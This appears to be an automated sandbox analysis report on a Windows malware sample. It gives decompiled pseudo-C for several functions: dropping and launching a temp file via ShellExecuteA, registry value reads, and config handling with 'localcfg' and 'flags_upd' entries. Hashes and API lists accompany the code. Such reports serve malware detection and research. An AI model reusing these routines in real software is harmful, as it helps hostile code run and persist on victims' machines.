                                                                                                                                  • Opcode Fuzzy Hash: 6324b7b9e2dccaab36c5df195a5e4e953a761730b1da31182c129fee2206b1b7
                                                                                                                                  • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00409145 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                  			E00409145(void* __eflags) {
				char _v264;
				char _v1288;
				char* _t13;
				void* _t20;
				void* _t23;
				void* _t29;

				_t29 = __eflags;
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				CharToOemA( &_v264,  &_v264);
				_t13 =  &_v264;
				_push(_t13);
				_push(_t13);
				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
				_t20 = E00409064(_t29,  &_v1288,  &_v264);
				if(_t20 != 0) {
					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
				}
				return _t20;
			}









                                                                                                                                  0x00409145
                                                                                                                                  0x00409166
                                                                                                                                  0x00409174
                                                                                                                                  0x0040917a
                                                                                                                                  0x00409180
                                                                                                                                  0x00409181
                                                                                                                                  0x004091a9
                                                                                                                                  0x004091b6
                                                                                                                                  0x004091c9
                                                                                                                                  0x004091d3
                                                                                                                                  0x00000000
                                                                                                                                  0x004091e1
                                                                                                                                  0x004091ea

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,PromptOnSecureDesktop), ref: 0040915F
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                                                                  • CharToOemA.USER32 ref: 00409174
                                                                                                                                  • wsprintfA.USER32 ref: 004091A9
                                                                                                                                    • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
                                                                                                                                    • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                                                                    • Part of subcall function 00409064: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                                                                    • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                                                                    • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                                                                    • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3857584221-2980165447
                                                                                                                                  • Opcode ID: 94b6a3cd4bae5339fb675e52ca0e10f722d210c4c3e56ae61748716d573fc5c2
                                                                                                                                  • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                                                                  • Opcode Fuzzy Hash: 94b6a3cd4bae5339fb675e52ca0e10f722d210c4c3e56ae61748716d573fc5c2
                                                                                                                                  • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD93AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 00AD93C6
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 00AD93CD
                                                                                                                                  • CharToOemA.USER32(?,?), ref: 00AD93DB
                                                                                                                                  • wsprintfA.USER32 ref: 00AD9410
                                                                                                                                    • Part of subcall function 00AD92CB: GetTempPathA.KERNEL32(00000400,?), ref: 00AD92E2
                                                                                                                                    • Part of subcall function 00AD92CB: wsprintfA.USER32 ref: 00AD9350
                                                                                                                                    • Part of subcall function 00AD92CB: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00AD9375
                                                                                                                                    • Part of subcall function 00AD92CB: lstrlen.KERNEL32(?,?,00000000), ref: 00AD9389
                                                                                                                                    • Part of subcall function 00AD92CB: WriteFile.KERNEL32(00000000,?,00000000), ref: 00AD9394
                                                                                                                                    • Part of subcall function 00AD92CB: CloseHandle.KERNEL32(00000000), ref: 00AD939B
                                                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00AD9448
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3857584221-2980165447
                                                                                                                                  • Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                                                                  • Instruction ID: bafb0e456df2b34b5a7c23d956ab2b96938125186af01b8b3b3065720206f7dd
                                                                                                                                  • Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                                                                  • Instruction Fuzzy Hash: 5E015EF69001187BDB21A7619D89EDF3B7CDB95701F0040A2BB4AE2180EAB49BC5CF75
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADAA28 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 247stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: $localcfg
                                                                                                                                  • API String ID: 1659193697-2018645984
                                                                                                                                  • Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                                                                  • Instruction ID: bd0a35fae379fbc19e0fde485de31ef1418525aeffd31340c964b05cdec44c7c
                                                                                                                                  • Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                                                                  • Instruction Fuzzy Hash: AB713D72A00304AAEF219B94DD85FEE377A9B20715F244027F907A63D1DB619DC4875B
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E354 Relevance: 9.2, APIs: 6, Instructions: 222COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$__mbtowc_l_get_int_arg_write_string
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4186970751-0
                                                                                                                                  • Opcode ID: a9b0658f57c9b68557d3b915ef1ce8d4fa1ad7a417cb490e0d2228624f03d81f
                                                                                                                                  • Instruction ID: f39460077ea95656aa980f8ee85ddbd5759fc33d01551210f6fb9fd778779053
                                                                                                                                  • Opcode Fuzzy Hash: a9b0658f57c9b68557d3b915ef1ce8d4fa1ad7a417cb490e0d2228624f03d81f
                                                                                                                                  • Instruction Fuzzy Hash: 52A173B1E002289BDB24CF56DC817AEB7B5BB44305F5481DAE6096B281D7386E84CF5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040E8A1 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 172stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
				CHAR* _v8;
				signed int _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				char _v37;
				char _v52;
				char _v56;
				intOrPtr _t87;
				intOrPtr _t95;
				int _t126;
				void* _t136;
				void* _t138;
				CHAR* _t139;
				void* _t146;
				char _t150;
				void* _t154;
				void* _t158;
				void* _t159;

				_t146 = __edx;
				_v20 = 0;
				E0040DD05();
				_t150 = _a4;
				_t158 = E0040DD84(_t150, _a8);
				_pop(_t138);
				if(_t158 != 0) {
					L2:
					_t16 = _t158 + 0x30; // 0x30
					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
					_t21 = lstrlenA(_a12) + 1; // 0x1
					_t136 = _t21;
					_t87 = lstrlenA(_a16) + _t136 + 1;
					_v16 = _t87;
					if(_v8 == 0) {
						_t139 =  *((intOrPtr*)(_t158 + 0x24));
						_v12 = _v12 & 0x00000000;
						_v8 = _t139;
						_t152 = _t139;
					} else {
						_t126 = lstrlenA(_v8);
						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
						_v12 = _t126 + _t136 + 1;
						_t87 = _v16;
						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
					}
					if(_v12 == _t87) {
						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
						_t77 = _t158 + 0x30; // 0x30
						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
							 *0x4136c0 = 1;
						}
					} else {
						_t41 = _t87 + 0x24; // 0x24
						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
						if(_t154 != 0) {
							_t43 = _t158 + 0xc; // 0xc
							E0040EE08(_t154, _t43,  &(_v8[0x24]));
							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
							_v20 =  &(_v8[_t154]);
							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
							_t66 = _t154 + 0x24; // 0x24
							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
							E0040EC2E(_t154);
							_v20 = 1;
						}
					}
					L10:
					E0040DD69();
					return _v20;
				}
				_v56 = _t150;
				_v28 = 0;
				_v24 = 3;
				lstrcpynA( &_v52, _a8, 0x10);
				_v37 = 0;
				_v32 = 0;
				_v36 = E004024C2( &_v20, 0, 0);
				E0040DF4C(_t146,  &_v56);
				_t158 = E0040DD84(_t150, _a8);
				_t159 = _t159 + 0x18;
				if(_t158 == 0) {
					goto L10;
				}
				goto L2;
			}

























                                                                                                                                  0x0040e8a1
                                                                                                                                  0x0040e8ac
                                                                                                                                  0x0040e8af
                                                                                                                                  0x0040e8b7
                                                                                                                                  0x0040e8c0
                                                                                                                                  0x0040e8c3
                                                                                                                                  0x0040e8c6
                                                                                                                                  0x0040e917
                                                                                                                                  0x0040e91a
                                                                                                                                  0x0040e932
                                                                                                                                  0x0040e93a
                                                                                                                                  0x0040e93a
                                                                                                                                  0x0040e943
                                                                                                                                  0x0040e947
                                                                                                                                  0x0040e94a
                                                                                                                                  0x0040e96a
                                                                                                                                  0x0040e96d
                                                                                                                                  0x0040e971
                                                                                                                                  0x0040e974
                                                                                                                                  0x0040e94c
                                                                                                                                  0x0040e94f
                                                                                                                                  0x0040e95c
                                                                                                                                  0x0040e95f
                                                                                                                                  0x0040e962
                                                                                                                                  0x0040e965
                                                                                                                                  0x0040e965
                                                                                                                                  0x0040e979
                                                                                                                                  0x0040ea3a
                                                                                                                                  0x0040ea4f
                                                                                                                                  0x0040ea59
                                                                                                                                  0x0040ea5d
                                                                                                                                  0x0040ea68
                                                                                                                                  0x0040ea6a
                                                                                                                                  0x0040ea6d
                                                                                                                                  0x0040ea6d
                                                                                                                                  0x0040e97f
                                                                                                                                  0x0040e985
                                                                                                                                  0x0040e98f
                                                                                                                                  0x0040e994
                                                                                                                                  0x0040e9a1
                                                                                                                                  0x0040e9a6
                                                                                                                                  0x0040e9b8
                                                                                                                                  0x0040e9c0
                                                                                                                                  0x0040e9c7
                                                                                                                                  0x0040e9dd
                                                                                                                                  0x0040ea02
                                                                                                                                  0x0040ea0c
                                                                                                                                  0x0040ea16
                                                                                                                                  0x0040ea19
                                                                                                                                  0x0040ea22
                                                                                                                                  0x0040ea28
                                                                                                                                  0x0040ea28
                                                                                                                                  0x0040e994
                                                                                                                                  0x0040ea77
                                                                                                                                  0x0040ea77
                                                                                                                                  0x0040ea83
                                                                                                                                  0x0040ea83
                                                                                                                                  0x0040e8d1
                                                                                                                                  0x0040e8d4
                                                                                                                                  0x0040e8d7
                                                                                                                                  0x0040e8de
                                                                                                                                  0x0040e8ea
                                                                                                                                  0x0040e8ed
                                                                                                                                  0x0040e8f5
                                                                                                                                  0x0040e8fc
                                                                                                                                  0x0040e90a
                                                                                                                                  0x0040e90c
                                                                                                                                  0x0040e911
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                    • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                    • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                    • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5
                                                                                                                                  • lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
                                                                                                                                  • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
                                                                                                                                  • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                                                                  • String ID: flags_upd$localcfg
                                                                                                                                  • API String ID: 204374128-3505511081
                                                                                                                                  • Opcode ID: a8706cbe59c11349abe89667f011435cb075cce9c025d7d828ab42ec1d016fb1
                                                                                                                                  • Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
                                                                                                                                  • Opcode Fuzzy Hash: a8706cbe59c11349abe89667f011435cb075cce9c025d7d828ab42ec1d016fb1
                                                                                                                                  • Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADE8BB Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 96stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00ADDF6C: GetCurrentThreadId.KERNEL32 ref: 00ADDFBA
                                                                                                                                  • lstrcmp.KERNEL32(00410178,00000000), ref: 00ADE8FA
                                                                                                                                  • lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,00AD6128), ref: 00ADE950
                                                                                                                                  • lstrcmp.KERNEL32(?,00000008), ref: 00ADE989
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmp$CurrentThreadlstrcpyn
                                                                                                                                  • String ID: A$ A$ A
                                                                                                                                  • API String ID: 2920362961-1846390581
                                                                                                                                  • Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                                                                  • Instruction ID: 011a75af45d52bff0f5ef39771d206e935a209eaa84ca13aac1c540f12480ceb
                                                                                                                                  • Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                                                                  • Instruction Fuzzy Hash: 7E319E316017059BDB71EF24C894BAABBE4FB05721F10892BE5678B751D370EC81CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD6E0E Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Code
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3609698214-0
                                                                                                                                  • Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                                                                  • Instruction ID: a74f01eaa8273b15f1a520d604e4e25194c27c9c4b5f5d97eeae5242cc338f28
                                                                                                                                  • Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                                                                  • Instruction Fuzzy Hash: 20214A76204219BFDB10ABA0ED49EDF3FBDEB49761B208426F503D5191EF709A4096B4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040DD05 Relevance: 9.0, APIs: 6, Instructions: 34threadsleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040DD05() {
				long _t4;
				long _t10;

				_t10 = GetTickCount();
				while(InterlockedExchange(0x4136b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x4136b8) {
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x4136bc =  *0x4136bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					L7:
					_t4 = GetCurrentThreadId();
					 *0x4136bc =  *0x4136bc + 1;
					 *0x4136b8 = _t4;
					return _t4;
				}
				goto L7;
			}





                                                                                                                                  0x0040dd17
                                                                                                                                  0x0040dd41
                                                                                                                                  0x0040dd2c
                                                                                                                                  0x0040dd37
                                                                                                                                  0x0040dd4c
                                                                                                                                  0x0040dd39
                                                                                                                                  0x0040dd3b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040dd3b
                                                                                                                                  0x0040dd37
                                                                                                                                  0x0040dd53
                                                                                                                                  0x0040dd53
                                                                                                                                  0x0040dd59
                                                                                                                                  0x0040dd62
                                                                                                                                  0x0040dd68
                                                                                                                                  0x0040dd68
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040DD20
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040DD2E
                                                                                                                                  • Sleep.KERNEL32(00000000,?,761B43E0,?,00000000,0040E538,?,761B43E0,?,00000000,?,0040A445), ref: 0040DD3B
                                                                                                                                  • InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3819781495-0
                                                                                                                                  • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                                                                  • Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
                                                                                                                                  • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                                                                  • Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004080C9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E004080C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				CHAR _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x412c3c = 0;
				 *0x412c38 = 0;
				if(E00406EC3() != 0) {
					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x412c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0040EC2E(_t42);
							 *0x412c3c = 0;
							goto L17;
						} else {
							_t45 = E0040EBCC(_v8);
							_pop(_t56);
							 *0x412c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0040EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x412c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0040EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E00407EE6(_t56);
					L20:
					_t70 =  *0x4121a8; // 0x0
					if(_t70 != 0) {
						_t71 =  *0x4121a4; // 0x0
						if(_t71 == 0) {
							_t31 = E0040675C(0x4121a8,  &_v20, 0);
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x4122d4 = E004024C2(_t61, _t63, 0);
								 *0x4121a4 = _t63;
								E0040EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}























                                                                                                                                  0x004080c9
                                                                                                                                  0x004080d7
                                                                                                                                  0x004080da
                                                                                                                                  0x004080e0
                                                                                                                                  0x004080ed
                                                                                                                                  0x0040810b
                                                                                                                                  0x00408110
                                                                                                                                  0x00408115
                                                                                                                                  0x00000000
                                                                                                                                  0x00408130
                                                                                                                                  0x00408151
                                                                                                                                  0x00408156
                                                                                                                                  0x00408167
                                                                                                                                  0x00408216
                                                                                                                                  0x0040821d
                                                                                                                                  0x00408222
                                                                                                                                  0x00000000
                                                                                                                                  0x00408222
                                                                                                                                  0x0040818b
                                                                                                                                  0x004081f7
                                                                                                                                  0x004081f7
                                                                                                                                  0x004081fe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408201
                                                                                                                                  0x00408206
                                                                                                                                  0x00000000
                                                                                                                                  0x00408198
                                                                                                                                  0x0040819b
                                                                                                                                  0x004081a0
                                                                                                                                  0x004081a1
                                                                                                                                  0x004081a8
                                                                                                                                  0x0040820d
                                                                                                                                  0x00408210
                                                                                                                                  0x00000000
                                                                                                                                  0x00408210
                                                                                                                                  0x004081aa
                                                                                                                                  0x004081c2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004081c4
                                                                                                                                  0x004081ca
                                                                                                                                  0x004081cd
                                                                                                                                  0x004081cd
                                                                                                                                  0x004081cf
                                                                                                                                  0x004081d0
                                                                                                                                  0x004081d8
                                                                                                                                  0x004081dd
                                                                                                                                  0x004081de
                                                                                                                                  0x004081e5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004081ef
                                                                                                                                  0x0040820c
                                                                                                                                  0x0040820c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040820c
                                                                                                                                  0x0040818b
                                                                                                                                  0x004080ef
                                                                                                                                  0x004080ef
                                                                                                                                  0x00408225
                                                                                                                                  0x00408225
                                                                                                                                  0x0040822b
                                                                                                                                  0x0040822d
                                                                                                                                  0x00408233
                                                                                                                                  0x0040823f
                                                                                                                                  0x00408244
                                                                                                                                  0x0040824b
                                                                                                                                  0x0040824d
                                                                                                                                  0x00408259
                                                                                                                                  0x0040825e
                                                                                                                                  0x00408264
                                                                                                                                  0x00408269
                                                                                                                                  0x0040824b
                                                                                                                                  0x00408233
                                                                                                                                  0x00408273
                                                                                                                                  0x00408273

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 0040815F
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 00408187
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 004081BE
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 00408210
                                                                                                                                    • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0040677E
